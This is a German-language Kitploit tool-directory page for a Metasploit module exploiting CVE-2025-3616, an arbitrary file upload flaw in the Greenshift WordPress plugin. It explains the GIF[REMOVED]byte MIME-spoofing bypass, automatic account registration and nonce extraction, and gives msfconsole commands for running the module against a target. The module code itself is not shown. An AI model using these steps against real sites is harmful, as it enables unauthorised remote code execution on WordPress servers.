Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3616 — Metasploit-Modul, das beliebigen Datei-Upload im Greenshift WordPress-Plugin (CVE-2025-3616) ausnutzt, um RCE über MIME-Spoofing zu erreichen, mit automatischer Registrierung und Nonce-Extraktion. | Kitploit
Tools/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsAuthentifizierungPayload-Entwicklung
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Metasploit-Modul, das beliebigen Datei-Upload im Greenshift WordPress-Plugin (CVE-2025-3616) ausnutzt, um RCE über MIME-Spoofing zu erreichen, mit automatischer Registrierung und Nonce-Extraktion.

Repository anzeigen
2vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Metasploit-Modul: Greenshift WordPress Plugin – Beliebiges Datei-Upload (CVE-2025-3616)

Dieses Repository enthält ein Metasploit-Modul zur Ausnutzung von CVE-2025-3616, einer Schwachstelle für beliebiges Datei-Upload im Greenshift WordPress Plugin (Versionen 11.4 bis 11.4.5).

Der Exploit ermöglicht authentifizierten Benutzern (Subscriber+) das Hochladen beliebiger Dateien, was zu Remote Code Execution (RCE) führt. Er umgeht die Dateityp-Validierung des Plugins, indem er den MIME-Typ mittels GIF-Magic-Bytes (GIF89a;) fälscht.

Funktionen

  • Authentifizierungshandhabung: Unterstützt Login mit vorhandenen Anmeldedaten (USERNAME/PASSWORD).
  • Auto-Registrierung: Enthält eine REGISTER-Option, um automatisch einen neuen Benutzer zu registrieren und die Schwachstelle mit den frischen Session-Cookies auszunutzen (nützlich, wenn die Registrierung auf dem Ziel aktiviert ist).
  • Nonce-Extraktion: Extrahiert automatisch das erforderliche wp_rest-Nonce aus dem administrativen Dashboard.
  • Sicherheitsumgehung: Fügt GIF-Magic-Bytes zum PHP-Payload hinzu, um die finfo_file()-Überprüfung zu umgehen.
  • Installation

    1. Stellen Sie sicher, dass das Metasploit-Framework installiert ist.

    2. Kopieren Sie wp_greenshift_file_upload.rb in Ihr lokales Module-Verzeichnis:

      root@kitploit:~
      mkdir -p ~/.msf4/modules/exploits/unix/webapp/
      cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
      
    3. Starten Sie msfconsole und laden Sie die Module neu:

      root@kitploit:~
      msfconsole
      msf6 > reload_all
      

    Verwendung

    1. Verwendung der Auto-Registrierung (Empfohlen)

    Wenn die Benutzerregistrierung auf dem Ziel aktiviert ist, benötigen Sie keine Anmeldedaten.

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER true
    run
    

    2. Verwendung vorhandener Anmeldedaten

    Wenn Sie bereits einen gültigen Benutzer (Subscriber oder höher) haben:

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER false
    set USERNAME <USER>
    set PASSWORD <PASS>
    run
    

    Optionen

    OptionErforderlichBeschreibung
    RHOSTSjaDie Zieladresse
    LHOSTjaDie Lauschadresse (Ihre IP)
    REGISTERneinAuf true setzen, um automatisch ein neues Konto zu registrieren (Standard: false)
    USERNAMEneinWordPress-Benutzername (erforderlich, wenn REGISTER false ist)
    PASSWORDneinWordPress-Passwort (erforderlich, wenn REGISTER false ist)
    EMAILneinE-Mail für die Registrierung (optional, wird bei Leerheit automatisch generiert)

    Haftungsausschluss

    Dieses Modul dient nur zu Bildungszwecken und autorisierten Penetrationstests. Die Verwendung dieses Codes zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal.

    Tool herunterladen